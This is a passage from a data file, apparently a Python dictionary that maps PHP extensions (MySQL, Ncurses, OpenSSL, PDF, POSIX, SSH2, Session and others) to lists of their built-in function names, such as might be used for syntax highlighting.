'msession_listvar',
'msession_lock',
'msession_plugin',
'msession_randstr',
'msession_set_array',
'msession_set_data',
'msession_set',
'msession_timeout',
'msession_uniq',
'msession_unlock'],
'Mssql': ['mssql_bind',
'mssql_close',
'mssql_connect',
'mssql_data_seek',
'mssql_execute',
'mssql_fetch_array',
'mssql_fetch_assoc',
'mssql_fetch_batch',
'mssql_fetch_field',
'mssql_fetch_object',
'mssql_fetch_row',
'mssql_field_length',
'mssql_field_name',
'mssql_field_seek',
'mssql_field_type',
'mssql_free_result',
'mssql_free_statement',
'mssql_get_last_message',
'mssql_guid_string',
'mssql_init',
'mssql_min_error_severity',
'mssql_min_message_severity',
'mssql_next_result',
'mssql_num_fields',
'mssql_num_rows',
'mssql_pconnect',
'mssql_query',
'mssql_result',
'mssql_rows_affected',
'mssql_select_db'],
'Multibyte String': ['mb_check_encoding',
'mb_convert_case',
'mb_convert_encoding',
'mb_convert_kana',
'mb_convert_variables',
'mb_decode_mimeheader',
'mb_decode_numericentity',
'mb_detect_encoding',
'mb_detect_order',
'mb_encode_mimeheader',
'mb_encode_numericentity',
'mb_encoding_aliases',
'mb_ereg_match',
'mb_ereg_replace',
'mb_ereg_search_getpos',
'mb_ereg_search_getregs',
'mb_ereg_search_init',
'mb_ereg_search_pos',
'mb_ereg_search_regs',
'mb_ereg_search_setpos',
'mb_ereg_search',
'mb_ereg',
'mb_eregi_replace',
'mb_eregi',
'mb_get_info',
'mb_http_input',
'mb_http_output',
'mb_internal_encoding',
'mb_language',
'mb_list_encodings',
'mb_output_handler',
'mb_parse_str',
'mb_preferred_mime_name',
'mb_regex_encoding',
'mb_regex_set_options',
'mb_send_mail',
'mb_split',
'mb_strcut',
'mb_strimwidth',
'mb_stripos',
'mb_stristr',
'mb_strlen',
'mb_strpos',
'mb_strrchr',
'mb_strrichr',
'mb_strripos',
'mb_strrpos',
'mb_strstr',
'mb_strtolower',
'mb_strtoupper',
'mb_strwidth',
'mb_substitute_character',
'mb_substr_count',
'mb_substr'],
'MySQL': ['mysql_affected_rows',
'mysql_client_encoding',
'mysql_close',
'mysql_connect',
'mysql_create_db',
'mysql_data_seek',
'mysql_db_name',
'mysql_db_query',
'mysql_drop_db',
'mysql_errno',
'mysql_error',
'mysql_escape_string',
'mysql_fetch_array',
'mysql_fetch_assoc',
'mysql_fetch_field',
'mysql_fetch_lengths',
'mysql_fetch_object',
'mysql_fetch_row',
'mysql_field_flags',
'mysql_field_len',
'mysql_field_name',
'mysql_field_seek',
'mysql_field_table',
'mysql_field_type',
'mysql_free_result',
'mysql_get_client_info',
'mysql_get_host_info',
'mysql_get_proto_info',
'mysql_get_server_info',
'mysql_info',
'mysql_insert_id',
'mysql_list_dbs',
'mysql_list_fields',
'mysql_list_processes',
'mysql_list_tables',
'mysql_num_fields',
'mysql_num_rows',
'mysql_pconnect',
'mysql_ping',
'mysql_query',
'mysql_real_escape_string',
'mysql_result',
'mysql_select_db',
'mysql_set_charset',
'mysql_stat',
'mysql_tablename',
'mysql_thread_id',
'mysql_unbuffered_query'],
'NSAPI': ['nsapi_request_headers', 'nsapi_response_headers', 'nsapi_virtual'],
'Ncurses': ['ncurses_addch',
'ncurses_addchnstr',
'ncurses_addchstr',
'ncurses_addnstr',
'ncurses_addstr',
'ncurses_assume_default_colors',
'ncurses_attroff',
'ncurses_attron',
'ncurses_attrset',
'ncurses_baudrate',
'ncurses_beep',
'ncurses_bkgd',
'ncurses_bkgdset',
'ncurses_border',
'ncurses_bottom_panel',
'ncurses_can_change_color',
'ncurses_cbreak',
'ncurses_clear',
'ncurses_clrtobot',
'ncurses_clrtoeol',
'ncurses_color_content',
'ncurses_color_set',
'ncurses_curs_set',
'ncurses_def_prog_mode',
'ncurses_def_shell_mode',
'ncurses_define_key',
'ncurses_del_panel',
'ncurses_delay_output',
'ncurses_delch',
'ncurses_deleteln',
'ncurses_delwin',
'ncurses_doupdate',
'ncurses_echo',
'ncurses_echochar',
'ncurses_end',
'ncurses_erase',
'ncurses_erasechar',
'ncurses_filter',
'ncurses_flash',
'ncurses_flushinp',
'ncurses_getch',
'ncurses_getmaxyx',
'ncurses_getmouse',
'ncurses_getyx',
'ncurses_halfdelay',
'ncurses_has_colors',
'ncurses_has_ic',
'ncurses_has_il',
'ncurses_has_key',
'ncurses_hide_panel',
'ncurses_hline',
'ncurses_inch',
'ncurses_init_color',
'ncurses_init_pair',
'ncurses_init',
'ncurses_insch',
'ncurses_insdelln',
'ncurses_insertln',
'ncurses_insstr',
'ncurses_instr',
'ncurses_isendwin',
'ncurses_keyok',
'ncurses_keypad',
'ncurses_killchar',
'ncurses_longname',
'ncurses_meta',
'ncurses_mouse_trafo',
'ncurses_mouseinterval',
'ncurses_mousemask',
'ncurses_move_panel',
'ncurses_move',
'ncurses_mvaddch',
'ncurses_mvaddchnstr',
'ncurses_mvaddchstr',
'ncurses_mvaddnstr',
'ncurses_mvaddstr',
'ncurses_mvcur',
'ncurses_mvdelch',
'ncurses_mvgetch',
'ncurses_mvhline',
'ncurses_mvinch',
'ncurses_mvvline',
'ncurses_mvwaddstr',
'ncurses_napms',
'ncurses_new_panel',
'ncurses_newpad',
'ncurses_newwin',
'ncurses_nl',
'ncurses_nocbreak',
'ncurses_noecho',
'ncurses_nonl',
'ncurses_noqiflush',
'ncurses_noraw',
'ncurses_pair_content',
'ncurses_panel_above',
'ncurses_panel_below',
'ncurses_panel_window',
'ncurses_pnoutrefresh',
'ncurses_prefresh',
'ncurses_putp',
'ncurses_qiflush',
'ncurses_raw',
'ncurses_refresh',
'ncurses_replace_panel',
'ncurses_reset_prog_mode',
'ncurses_reset_shell_mode',
'ncurses_resetty',
'ncurses_savetty',
'ncurses_scr_dump',
'ncurses_scr_init',
'ncurses_scr_restore',
'ncurses_scr_set',
'ncurses_scrl',
'ncurses_show_panel',
'ncurses_slk_attr',
'ncurses_slk_attroff',
'ncurses_slk_attron',
'ncurses_slk_attrset',
'ncurses_slk_clear',
'ncurses_slk_color',
'ncurses_slk_init',
'ncurses_slk_noutrefresh',
'ncurses_slk_refresh',
'ncurses_slk_restore',
'ncurses_slk_set',
'ncurses_slk_touch',
'ncurses_standend',
'ncurses_standout',
'ncurses_start_color',
'ncurses_termattrs',
'ncurses_termname',
'ncurses_timeout',
'ncurses_top_panel',
'ncurses_typeahead',
'ncurses_ungetch',
'ncurses_ungetmouse',
'ncurses_update_panels',
'ncurses_use_default_colors',
'ncurses_use_env',
'ncurses_use_extended_names',
'ncurses_vidattr',
'ncurses_vline',
'ncurses_waddch',
'ncurses_waddstr',
'ncurses_wattroff',
'ncurses_wattron',
'ncurses_wattrset',
'ncurses_wborder',
'ncurses_wclear',
'ncurses_wcolor_set',
'ncurses_werase',
'ncurses_wgetch',
'ncurses_whline',
'ncurses_wmouse_trafo',
'ncurses_wmove',
'ncurses_wnoutrefresh',
'ncurses_wrefresh',
'ncurses_wstandend',
'ncurses_wstandout',
'ncurses_wvline'],
'Network': ['checkdnsrr',
'closelog',
'define_syslog_variables',
'dns_check_record',
'dns_get_mx',
'dns_get_record',
'fsockopen',
'gethostbyaddr',
'gethostbyname',
'gethostbynamel'],
'Newt': ['newt_bell',
'newt_button_bar',
'newt_button',
'newt_centered_window',
'newt_checkbox_get_value',
'newt_checkbox_set_flags',
'newt_checkbox_set_value',
'newt_checkbox_tree_add_item',
'newt_checkbox_tree_find_item',
'newt_checkbox_tree_get_current',
'newt_checkbox_tree_get_entry_value',
'newt_checkbox_tree_get_multi_selection',
'newt_checkbox_tree_get_selection',
'newt_checkbox_tree_multi',
'newt_checkbox_tree_set_current',
'newt_checkbox_tree_set_entry_value',
'newt_checkbox_tree_set_entry',
'newt_checkbox_tree_set_width',
'newt_checkbox_tree',
'newt_checkbox',
'newt_clear_key_buffer'],
'OAuth': ['oauth_get_sbs', 'oauth_urlencode'],
'OCI8': ['oci_bind_array_by_name',
'oci_bind_by_name',
'oci_cancel',
'oci_close',
'oci_commit',
'oci_connect',
'oci_define_by_name',
'oci_error',
'oci_execute',
'oci_fetch_all',
'oci_fetch_array',
'oci_fetch_assoc',
'oci_fetch_object',
'oci_fetch_row',
'oci_fetch',
'oci_field_is_null',
'oci_field_name',
'oci_field_precision',
'oci_field_scale',
'oci_field_size',
'oci_field_type_raw',
'oci_field_type',
'oci_free_statement',
'oci_internal_debug',
'oci_lob_copy',
'oci_lob_is_equal',
'oci_new_collection',
'oci_new_connect',
'oci_new_cursor',
'oci_new_descriptor',
'oci_num_fields',
'oci_num_rows',
'oci_parse',
'oci_password_change',
'oci_pconnect',
'oci_result',
'oci_rollback',
'oci_server_version',
'oci_set_action',
'oci_set_client_identifier',
'oci_set_client_info',
'oci_set_edition',
'oci_set_module_name',
'oci_set_prefetch',
'oci_statement_type'],
'ODBC': ['odbc_autocommit',
'odbc_binmode',
'odbc_close_all',
'odbc_close',
'odbc_columnprivileges',
'odbc_columns',
'odbc_commit',
'odbc_connect',
'odbc_cursor',
'odbc_data_source',
'odbc_do',
'odbc_error',
'odbc_errormsg',
'odbc_exec',
'odbc_execute',
'odbc_fetch_array',
'odbc_fetch_into',
'odbc_fetch_object',
'odbc_fetch_row',
'odbc_field_len',
'odbc_field_name',
'odbc_field_num',
'odbc_field_precision',
'odbc_field_scale',
'odbc_field_type',
'odbc_foreignkeys',
'odbc_free_result',
'odbc_gettypeinfo',
'odbc_longreadlen',
'odbc_next_result',
'odbc_num_fields',
'odbc_num_rows',
'odbc_pconnect',
'odbc_prepare',
'odbc_primarykeys',
'odbc_procedurecolumns',
'odbc_procedures',
'odbc_result_all',
'odbc_result',
'odbc_rollback',
'odbc_setoption',
'odbc_specialcolumns',
'odbc_statistics',
'odbc_tableprivileges',
'odbc_tables'],
'Object Aggregation': ['aggregate_info',
'aggregate_methods_by_list',
'aggregate_methods_by_regexp'],
'Object overloading': ['overload'],
'OpenAL': ['openal_buffer_create',
'openal_buffer_data',
'openal_buffer_destroy',
'openal_buffer_get',
'openal_buffer_loadwav',
'openal_context_create',
'openal_context_current',
'openal_context_destroy',
'openal_context_process',
'openal_context_suspend',
'openal_device_close',
'openal_device_open',
'openal_listener_get',
'openal_listener_set',
'openal_source_create',
'openal_source_destroy',
'openal_source_get',
'openal_source_pause',
'openal_source_play',
'openal_source_rewind',
'openal_source_set',
'openal_source_stop',
'openal_stream'],
'OpenSSL': ['openssl_csr_export_to_file',
'openssl_csr_export',
'openssl_csr_get_public_key',
'openssl_csr_get_subject',
'openssl_csr_new',
'openssl_csr_sign',
'openssl_decrypt',
'openssl_dh_compute_key',
'openssl_digest',
'openssl_encrypt',
'openssl_error_string',
'openssl_free_key',
'openssl_get_cipher_methods',
'openssl_get_md_methods',
'openssl_get_privatekey',
'openssl_get_publickey',
'openssl_open',
'openssl_pkcs12_export_to_file',
'openssl_pkcs12_export',
'openssl_pkcs12_read',
'openssl_pkcs7_decrypt',
'openssl_pkcs7_encrypt',
'openssl_pkcs7_sign',
'openssl_pkcs7_verify',
'openssl_pkey_export_to_file',
'openssl_pkey_export',
'openssl_pkey_free',
'openssl_pkey_get_details',
'openssl_pkey_get_private',
'openssl_pkey_get_public',
'openssl_pkey_new',
'openssl_private_decrypt',
'openssl_private_encrypt',
'openssl_public_decrypt',
'openssl_public_encrypt',
'openssl_random_pseudo_bytes',
'openssl_seal',
'openssl_sign',
'openssl_verify',
'openssl_x509_check_private_key',
'openssl_x509_checkpurpose',
'openssl_x509_export_to_file',
'openssl_x509_export',
'openssl_x509_free',
'openssl_x509_parse',
'openssl_x509_read'],
'Output Control': ['flush',
'ob_clean',
'ob_end_clean',
'ob_end_flush',
'ob_flush',
'ob_get_clean',
'ob_get_contents',
'ob_get_flush',
'ob_get_length',
'ob_get_level',
'ob_get_status',
'ob_gzhandler',
'ob_implicit_flush',
'ob_list_handlers',
'ob_start',
'output_add_rewrite_var',
'output_reset_rewrite_vars'],
'Ovrimos SQL': ['ovrimos_close',
'ovrimos_commit',
'ovrimos_connect',
'ovrimos_cursor',
'ovrimos_exec',
'ovrimos_execute',
'ovrimos_fetch_into',
'ovrimos_fetch_row',
'ovrimos_field_len',
'ovrimos_field_name',
'ovrimos_field_num',
'ovrimos_field_type',
'ovrimos_free_result',
'ovrimos_longreadlen',
'ovrimos_num_fields',
'ovrimos_num_rows',
'ovrimos_prepare',
'ovrimos_result_all',
'ovrimos_result',
'ovrimos_rollback'],
'PCNTL': ['pcntl_alarm',
'pcntl_exec',
'pcntl_fork',
'pcntl_getpriority',
'pcntl_setpriority',
'pcntl_signal_dispatch',
'pcntl_signal',
'pcntl_sigprocmask',
'pcntl_sigtimedwait',
'pcntl_sigwaitinfo',
'pcntl_wait',
'pcntl_waitpid',
'pcntl_wexitstatus',
'pcntl_wifexited',
'pcntl_wifsignaled',
'pcntl_wifstopped',
'pcntl_wstopsig',
'pcntl_wtermsig'],
'PCRE': ['preg_filter',
'preg_grep',
'preg_last_error',
'preg_match_all',
'preg_match',
'preg_quote',
'preg_replace_callback',
'preg_replace',
'preg_split'],
'PDF': ['PDF_activate_item',
'PDF_add_annotation',
'PDF_add_bookmark',
'PDF_add_launchlink',
'PDF_add_locallink',
'PDF_add_nameddest',
'PDF_add_note',
'PDF_add_outline',
'PDF_add_pdflink',
'PDF_add_table_cell',
'PDF_add_textflow',
'PDF_add_thumbnail',
'PDF_add_weblink',
'PDF_arc',
'PDF_arcn',
'PDF_attach_file',
'PDF_begin_document',
'PDF_begin_font',
'PDF_begin_glyph',
'PDF_begin_item',
'PDF_begin_layer',
'PDF_begin_page_ext',
'PDF_begin_page',
'PDF_begin_pattern',
'PDF_begin_template_ext',
'PDF_begin_template',
'PDF_circle',
'PDF_clip',
'PDF_close_image',
'PDF_close_pdi_page',
'PDF_close_pdi',
'PDF_close',
'PDF_closepath_fill_stroke',
'PDF_closepath_stroke',
'PDF_closepath',
'PDF_concat',
'PDF_continue_text',
'PDF_create_3dview',
'PDF_create_action',
'PDF_create_annotation',
'PDF_create_bookmark',
'PDF_create_field',
'PDF_create_fieldgroup',
'PDF_create_gstate',
'PDF_create_pvf',
'PDF_create_textflow',
'PDF_curveto',
'PDF_define_layer',
'PDF_delete_pvf',
'PDF_delete_table',
'PDF_delete_textflow',
'PDF_delete',
'PDF_encoding_set_char',
'PDF_end_document',
'PDF_end_font',
'PDF_end_glyph',
'PDF_end_item',
'PDF_end_layer',
'PDF_end_page_ext',
'PDF_end_page',
'PDF_end_pattern',
'PDF_end_template',
'PDF_endpath',
'PDF_fill_imageblock',
'PDF_fill_pdfblock',
'PDF_fill_stroke',
'PDF_fill_textblock',
'PDF_fill',
'PDF_findfont',
'PDF_fit_image',
'PDF_fit_pdi_page',
'PDF_fit_table',
'PDF_fit_textflow',
'PDF_fit_textline',
'PDF_get_apiname',
'PDF_get_buffer',
'PDF_get_errmsg',
'PDF_get_errnum',
'PDF_get_font',
'PDF_get_fontname',
'PDF_get_fontsize',
'PDF_get_image_height',
'PDF_get_image_width',
'PDF_get_majorversion',
'PDF_get_minorversion',
'PDF_get_parameter',
'PDF_get_pdi_parameter',
'PDF_get_pdi_value',
'PDF_get_value',
'PDF_info_font',
'PDF_info_matchbox',
'PDF_info_table',
'PDF_info_textflow',
'PDF_info_textline',
'PDF_initgraphics',
'PDF_lineto',
'PDF_load_3ddata',
'PDF_load_font',
'PDF_load_iccprofile',
'PDF_load_image',
'PDF_makespotcolor',
'PDF_moveto',
'PDF_new',
'PDF_open_ccitt',
'PDF_open_file',
'PDF_open_gif',
'PDF_open_image_file',
'PDF_open_image',
'PDF_open_jpeg',
'PDF_open_memory_image',
'PDF_open_pdi_document',
'PDF_open_pdi_page',
'PDF_open_pdi',
'PDF_open_tiff',
'PDF_pcos_get_number',
'PDF_pcos_get_stream',
'PDF_pcos_get_string',
'PDF_place_image',
'PDF_place_pdi_page',
'PDF_process_pdi',
'PDF_rect',
'PDF_restore',
'PDF_resume_page',
'PDF_rotate',
'PDF_save',
'PDF_scale',
'PDF_set_border_color',
'PDF_set_border_dash',
'PDF_set_border_style',
'PDF_set_char_spacing',
'PDF_set_duration',
'PDF_set_gstate',
'PDF_set_horiz_scaling',
'PDF_set_info_author',
'PDF_set_info_creator',
'PDF_set_info_keywords',
'PDF_set_info_subject',
'PDF_set_info_title',
'PDF_set_info',
'PDF_set_layer_dependency',
'PDF_set_leading',
'PDF_set_parameter',
'PDF_set_text_matrix',
'PDF_set_text_pos',
'PDF_set_text_rendering',
'PDF_set_text_rise',
'PDF_set_value',
'PDF_set_word_spacing',
'PDF_setcolor',
'PDF_setdash',
'PDF_setdashpattern',
'PDF_setflat',
'PDF_setfont',
'PDF_setgray_fill',
'PDF_setgray_stroke',
'PDF_setgray',
'PDF_setlinecap',
'PDF_setlinejoin',
'PDF_setlinewidth',
'PDF_setmatrix',
'PDF_setmiterlimit',
'PDF_setpolydash',
'PDF_setrgbcolor_fill',
'PDF_setrgbcolor_stroke',
'PDF_setrgbcolor',
'PDF_shading_pattern',
'PDF_shading',
'PDF_shfill',
'PDF_show_boxed',
'PDF_show_xy',
'PDF_show',
'PDF_skew',
'PDF_stringwidth',
'PDF_stroke',
'PDF_suspend_page',
'PDF_translate',
'PDF_utf16_to_utf8',
'PDF_utf32_to_utf16',
'PDF_utf8_to_utf16'],
'PHP Options/Info': ['assert_options',
'assert',
'dl',
'extension_loaded',
'gc_collect_cycles',
'gc_disable',
'gc_enable',
'gc_enabled',
'get_cfg_var',
'get_current_user',
'get_defined_constants',
'get_extension_funcs',
'get_include_path',
'get_included_files',
'get_loaded_extensions',
'get_magic_quotes_gpc',
'get_magic_quotes_runtime',
'get_required_files',
'getenv',
'getlastmod',
'getmygid',
'getmyinode',
'getmypid',
'getmyuid',
'getopt',
'getrusage',
'ini_alter',
'ini_get_all',
'ini_get',
'ini_restore',
'ini_set',
'magic_quotes_runtime',
'memory_get_peak_usage',
'memory_get_usage',
'php_ini_loaded_file',
'php_ini_scanned_files',
'php_logo_guid',
'php_sapi_name',
'php_uname',
'phpcredits',
'phpinfo',
'phpversion',
'putenv',
'restore_include_path',
'set_include_path',
'set_magic_quotes_runtime',
'set_time_limit',
'sys_get_temp_dir',
'version_compare',
'zend_logo_guid',
'zend_thread_id',
'zend_version'],
'POSIX': ['posix_access',
'posix_ctermid',
'posix_errno',
'posix_get_last_error',
'posix_getcwd',
'posix_getegid',
'posix_geteuid',
'posix_getgid',
'posix_getgrgid',
'posix_getgrnam',
'posix_getgroups',
'posix_getlogin',
'posix_getpgid',
'posix_getpgrp',
'posix_getpid',
'posix_getppid',
'posix_getpwnam',
'posix_getpwuid',
'posix_getrlimit',
'posix_getsid',
'posix_getuid',
'posix_initgroups',
'posix_isatty',
'posix_kill',
'posix_mkfifo',
'posix_mknod',
'posix_setegid',
'posix_seteuid',
'posix_setgid',
'posix_setpgid',
'posix_setsid',
'posix_setuid',
'posix_strerror',
'posix_times',
'posix_ttyname',
'posix_uname'],
'POSIX Regex': ['ereg_replace',
'ereg',
'eregi_replace',
'eregi',
'split',
'spliti',
'sql_regcase'],
'PS': ['ps_add_bookmark',
'ps_add_launchlink',
'ps_add_locallink',
'ps_add_note',
'ps_add_pdflink',
'ps_add_weblink',
'ps_arc',
'ps_arcn',
'ps_begin_page',
'ps_begin_pattern',
'ps_begin_template',
'ps_circle',
'ps_clip',
'ps_close_image',
'ps_close',
'ps_closepath_stroke',
'ps_closepath',
'ps_continue_text',
'ps_curveto',
'ps_delete',
'ps_end_page',
'ps_end_pattern',
'ps_end_template',
'ps_fill_stroke',
'ps_fill',
'ps_findfont',
'ps_get_buffer',
'ps_get_parameter',
'ps_get_value',
'ps_hyphenate',
'ps_include_file',
'ps_lineto',
'ps_makespotcolor',
'ps_moveto',
'ps_new',
'ps_open_file',
'ps_open_image_file',
'ps_open_image',
'ps_open_memory_image',
'ps_place_image',
'ps_rect',
'ps_restore',
'ps_rotate',
'ps_save',
'ps_scale',
'ps_set_border_color',
'ps_set_border_dash',
'ps_set_border_style',
'ps_set_info',
'ps_set_parameter',
'ps_set_text_pos',
'ps_set_value',
'ps_setcolor',
'ps_setdash',
'ps_setflat',
'ps_setfont',
'ps_setgray',
'ps_setlinecap',
'ps_setlinejoin',
'ps_setlinewidth',
'ps_setmiterlimit',
'ps_setoverprintmode',
'ps_setpolydash',
'ps_shading_pattern',
'ps_shading',
'ps_shfill',
'ps_show_boxed',
'ps_show_xy2',
'ps_show_xy',
'ps_show2',
'ps_show',
'ps_string_geometry',
'ps_stringwidth',
'ps_stroke',
'ps_symbol_name',
'ps_symbol_width',
'ps_symbol',
'ps_translate'],
'Paradox': ['px_close',
'px_create_fp',
'px_date2string',
'px_delete_record',
'px_delete',
'px_get_field',
'px_get_info',
'px_get_parameter',
'px_get_record',
'px_get_schema',
'px_get_value',
'px_insert_record',
'px_new',
'px_numfields',
'px_numrecords',
'px_open_fp',
'px_put_record',
'px_retrieve_record',
'px_set_blob_file',
'px_set_parameter',
'px_set_tablename',
'px_set_targetencoding',
'px_set_value',
'px_timestamp2string',
'px_update_record'],
'Parsekit': ['parsekit_compile_file',
'parsekit_compile_string',
'parsekit_func_arginfo'],
'PostgreSQL': ['pg_affected_rows',
'pg_cancel_query',
'pg_client_encoding',
'pg_close',
'pg_connect',
'pg_connection_busy',
'pg_connection_reset',
'pg_connection_status',
'pg_convert',
'pg_copy_from',
'pg_copy_to',
'pg_dbname',
'pg_delete',
'pg_end_copy',
'pg_escape_bytea',
'pg_escape_string',
'pg_execute',
'pg_fetch_all_columns',
'pg_fetch_all',
'pg_fetch_array',
'pg_fetch_assoc',
'pg_fetch_object',
'pg_fetch_result',
'pg_fetch_row',
'pg_field_is_null',
'pg_field_name',
'pg_field_num',
'pg_field_prtlen',
'pg_field_size',
'pg_field_table',
'pg_field_type_oid',
'pg_field_type',
'pg_free_result',
'pg_get_notify',
'pg_get_pid',
'pg_get_result',
'pg_host',
'pg_insert',
'pg_last_error',
'pg_last_notice',
'pg_last_oid',
'pg_lo_close',
'pg_lo_create',
'pg_lo_export',
'pg_lo_import',
'pg_lo_open',
'pg_lo_read_all',
'pg_lo_read',
'pg_lo_seek',
'pg_lo_tell',
'pg_lo_unlink',
'pg_lo_write',
'pg_meta_data',
'pg_num_fields',
'pg_num_rows',
'pg_options',
'pg_parameter_status',
'pg_pconnect',
'pg_ping',
'pg_port',
'pg_prepare'],
'Printer': ['printer_abort',
'printer_close',
'printer_create_brush',
'printer_create_dc',
'printer_create_font',
'printer_create_pen',
'printer_delete_brush',
'printer_delete_dc',
'printer_delete_font',
'printer_delete_pen',
'printer_draw_bmp',
'printer_draw_chord',
'printer_draw_elipse',
'printer_draw_line',
'printer_draw_pie',
'printer_draw_rectangle',
'printer_draw_roundrect',
'printer_draw_text',
'printer_end_doc',
'printer_end_page',
'printer_get_option',
'printer_list',
'printer_logical_fontheight',
'printer_open',
'printer_select_brush',
'printer_select_font',
'printer_select_pen',
'printer_set_option',
'printer_start_doc',
'printer_start_page',
'printer_write'],
'Program execution': ['escapeshellarg',
'escapeshellcmd',
'exec',
'passthru',
'proc_close',
'proc_get_status',
'proc_nice',
'proc_open',
'proc_terminate',
'shell_exec',
'system'],
'Pspell': ['pspell_add_to_personal',
'pspell_add_to_session',
'pspell_check',
'pspell_clear_session',
'pspell_config_create',
'pspell_config_data_dir',
'pspell_config_dict_dir',
'pspell_config_ignore',
'pspell_config_mode',
'pspell_config_personal',
'pspell_config_repl',
'pspell_config_runtogether',
'pspell_config_save_repl'],
'RPM Reader': ['rpm_close',
'rpm_get_tag',
'rpm_is_valid',
'rpm_open',
'rpm_version'],
'RRD': ['rrd_create',
'rrd_error',
'rrd_fetch',
'rrd_first',
'rrd_graph',
'rrd_info',
'rrd_last',
'rrd_lastupdate',
'rrd_restore',
'rrd_tune',
'rrd_update',
'rrd_xport'],
'Radius': ['radius_acct_open',
'radius_add_server',
'radius_auth_open',
'radius_close',
'radius_config',
'radius_create_request',
'radius_cvt_addr',
'radius_cvt_int',
'radius_cvt_string',
'radius_demangle_mppe_key',
'radius_demangle',
'radius_get_attr',
'radius_get_vendor_attr',
'radius_put_addr',
'radius_put_attr',
'radius_put_int',
'radius_put_string',
'radius_put_vendor_addr',
'radius_put_vendor_attr',
'radius_put_vendor_int',
'radius_put_vendor_string',
'radius_request_authenticator',
'radius_send_request',
'radius_server_secret',
'radius_strerror'],
'Rar': ['rar_wrapper_cache_stats'],
'Readline': ['readline_add_history',
'readline_callback_handler_install',
'readline_callback_handler_remove',
'readline_callback_read_char',
'readline_clear_history',
'readline_completion_function',
'readline_info',
'readline_list_history',
'readline_on_new_line',
'readline_read_history',
'readline_redisplay',
'readline_write_history',
'readline'],
'Recode': ['recode_file', 'recode_string', 'recode'],
'SNMP': ['snmp_get_quick_print',
'snmp_get_valueretrieval',
'snmp_read_mib',
'snmp_set_enum_print',
'snmp_set_oid_numeric_print',
'snmp_set_oid_output_format',
'snmp_set_quick_print',
'snmp_set_valueretrieval',
'snmp2_get',
'snmp2_getnext',
'snmp2_real_walk',
'snmp2_set',
'snmp2_walk',
'snmp3_get',
'snmp3_getnext',
'snmp3_real_walk',
'snmp3_set',
'snmp3_walk',
'snmpget',
'snmpgetnext',
'snmprealwalk',
'snmpset',
'snmpwalk',
'snmpwalkoid'],
'SOAP': ['is_soap_fault', 'use_soap_error_handler'],
'SPL': ['class_implements',
'class_parents',
'iterator_apply',
'iterator_count',
'iterator_to_array',
'spl_autoload_call',
'spl_autoload_extensions',
'spl_autoload_functions',
'spl_autoload_register',
'spl_autoload_unregister',
'spl_autoload',
'spl_classes',
'spl_object_hash'],
'SPPLUS': ['calcul_hmac', 'calculhmac', 'nthmac', 'signeurlpaiement'],
'SQLite': ['sqlite_array_query', 'sqlite_busy_timeout', 'sqlite_changes'],
'SSH2': ['ssh2_auth_hostbased_file',
'ssh2_auth_none',
'ssh2_auth_password',
'ssh2_auth_pubkey_file',
'ssh2_connect',
'ssh2_exec',
'ssh2_fetch_stream',
'ssh2_fingerprint',
'ssh2_methods_negotiated',
'ssh2_publickey_add',
'ssh2_publickey_init',
'ssh2_publickey_list',
'ssh2_publickey_remove',
'ssh2_scp_recv',
'ssh2_scp_send',
'ssh2_sftp_lstat',
'ssh2_sftp_mkdir',
'ssh2_sftp_readlink',
'ssh2_sftp_realpath',
'ssh2_sftp_rename',
'ssh2_sftp_rmdir',
'ssh2_sftp_stat',
'ssh2_sftp_symlink',
'ssh2_sftp_unlink',
'ssh2_sftp',
'ssh2_shell',
'ssh2_tunnel'],
'SVN': ['svn_add',
'svn_auth_get_parameter',
'svn_auth_set_parameter',
'svn_blame',
'svn_cat',
'svn_checkout',
'svn_cleanup',
'svn_client_version',
'svn_commit',
'svn_delete',
'svn_diff',
'svn_export',
'svn_fs_abort_txn',
'svn_fs_apply_text',
'svn_fs_begin_txn2',
'svn_fs_change_node_prop',
'svn_fs_check_path',
'svn_fs_contents_changed',
'svn_fs_copy',
'svn_fs_delete',
'svn_fs_dir_entries',
'svn_fs_file_contents',
'svn_fs_file_length',
'svn_fs_is_dir',
'svn_fs_is_file',
'svn_fs_make_dir',
'svn_fs_make_file',
'svn_fs_node_created_rev',
'svn_fs_node_prop',
'svn_fs_props_changed',
'svn_fs_revision_prop',
'svn_fs_revision_root',
'svn_fs_txn_root',
'svn_fs_youngest_rev',
'svn_import',
'svn_log',
'svn_ls',
'svn_mkdir',
'svn_repos_create',
'svn_repos_fs_begin_txn_for_commit',
'svn_repos_fs_commit_txn',
'svn_repos_fs',
'svn_repos_hotcopy',
'svn_repos_open',
'svn_repos_recover',
'svn_revert',
'svn_status',
'svn_update'],
'SWF': ['swf_actiongeturl',
'swf_actiongotoframe',
'swf_actiongotolabel',
'swf_actionnextframe',
'swf_actionplay',
'swf_actionprevframe',
'swf_actionsettarget',
'swf_actionstop',
'swf_actiontogglequality',
'swf_actionwaitforframe',
'swf_addbuttonrecord',
'swf_addcolor',
'swf_closefile',
'swf_definebitmap',
'swf_definefont',
'swf_defineline',
'swf_definepoly',
'swf_definerect',
'swf_definetext',
'swf_endbutton',
'swf_enddoaction',
'swf_endshape',
'swf_endsymbol',
'swf_fontsize',
'swf_fontslant',
'swf_fonttracking',
'swf_getbitmapinfo',
'swf_getfontinfo',
'swf_getframe',
'swf_labelframe',
'swf_lookat',
'swf_modifyobject',
'swf_mulcolor',
'swf_nextid',
'swf_oncondition',
'swf_openfile',
'swf_ortho2',
'swf_ortho',
'swf_perspective',
'swf_placeobject',
'swf_polarview',
'swf_popmatrix',
'swf_posround',
'swf_pushmatrix',
'swf_removeobject',
'swf_rotate',
'swf_scale',
'swf_setfont',
'swf_setframe',
'swf_shapearc',
'swf_shapecurveto3',
'swf_shapecurveto',
'swf_shapefillbitmapclip',
'swf_shapefillbitmaptile',
'swf_shapefilloff',
'swf_shapefillsolid',
'swf_shapelinesolid',
'swf_shapelineto',
'swf_shapemoveto',
'swf_showframe',
'swf_startbutton',
'swf_startdoaction',
'swf_startshape',
'swf_startsymbol',
'swf_textwidth',
'swf_translate',
'swf_viewport'],
'Semaphore': ['ftok',
'msg_get_queue',
'msg_queue_exists',
'msg_receive',
'msg_remove_queue',
'msg_send',
'msg_set_queue',
'msg_stat_queue',
'sem_acquire',
'sem_get',
'sem_release',
'sem_remove',
'shm_attach',
'shm_detach',
'shm_get_var',
'shm_has_var',
'shm_put_var',
'shm_remove_var',
'shm_remove'],
'Session': ['session_cache_expire',
'session_cache_limiter',
'session_commit',
'session_decode',
'session_destroy',
'session_encode',
'session_get_cookie_params',
'session_id',
'session_is_registered',
'session_module_name',
'session_name',
'session_regenerate_id',
'session_register',
'session_save_path',
'session_set_cookie_params',
'session_set_save_handler',
'session_start',
'session_unregister',
'session_unset',
'session_write_close'],
